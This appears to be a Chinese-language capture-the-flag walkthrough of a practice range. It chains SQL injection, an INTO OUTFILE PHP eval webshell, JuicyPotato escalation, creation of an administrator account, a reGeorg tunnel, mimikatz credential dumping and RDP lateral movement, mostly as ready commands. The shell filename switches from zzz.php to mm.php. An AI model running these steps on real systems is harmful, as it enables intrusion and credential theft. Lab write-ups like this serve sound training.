Getshell
输入 ?id=1' 网站报错 爆出网站的绝对路径
?id=1 order by 2 发现存在两个字段
使用union select没有回显,使用 into outfile 进行文件写入
?id = 1 and 1=2 union select 1,2 into outfile 'C:/phpStudy/WWW/m.txt'
访问 m.txt 成功写入
尝试写入一句话到网站根目录中
?id=1 union select 1,'<?php eval($_REQUEST[8])?>' into outfile 'C:/phpStudy/WWW/zzz.php'
访问mm.php发现成功写入,使用蚁剑进行连接
信息收集
进入终端查看当前权限 whoami 发现权限为 test权限
ipconfig发现内网ip 为 10.0.1.4
netstat -ano 查看开放的端口
tasklist 查看运行的进程
systeminfo 查看系统信息 补丁号
http://bugs.hacking8.com/tiquan/
去这个网站找一下可以利用的exp
JuicyPotato提权
HotPotato提权
上传 JuicyPotato.exe
bbb.exe -p "whoami"
提权为system权限,然后再添加用户
net user Mamor A1S2D3! /add
bbb.exe -p "net localgroup administrators Mamor /add" //将用户添加到管理员组权限
net user 查看是否创建成功
成功创建用户
内网穿透
内网穿透两种方法: 1.让目标机器去连接外网主机(需要公网ip) 前提是目标可以访问外网 2.在目标机器上设置信号站(放一个web文件带目标服务器,所有的流量都要通过这个文件)
使用reGeorg进行内网穿透
将 reGeorg中的 tunnel.nosocket.php 传到目标机器 改名为reG.php
再公网访问下
本机执行 (python2)
python reGeorgSocksProxy.py -l 127.0.0.1 -p 9999 -u http://afsgr16-b1ferw.aqlab.cn/reG.php
本机使用Proxifier 设置代理服务器 127.0.0.1 9999 socks5
设置代理规则
设置完代理后 使用 mstsc 远程连接10.0.1.4 成功登录
使用 mimikatz 读取密码
将 mimikatz通过蚁剑上传到服务器 以管理员身份运行(windows2012/2016不能抓)
提权privilege::debug
抓取密码 sekurlsa::logonpasswords
成功抓取到Administrator密码 woshifengge1.
flag
探测内网中是否还有其它主机
mstsc 尝试连接10.0.1.8 使用admin 密码成功登录
得到flag
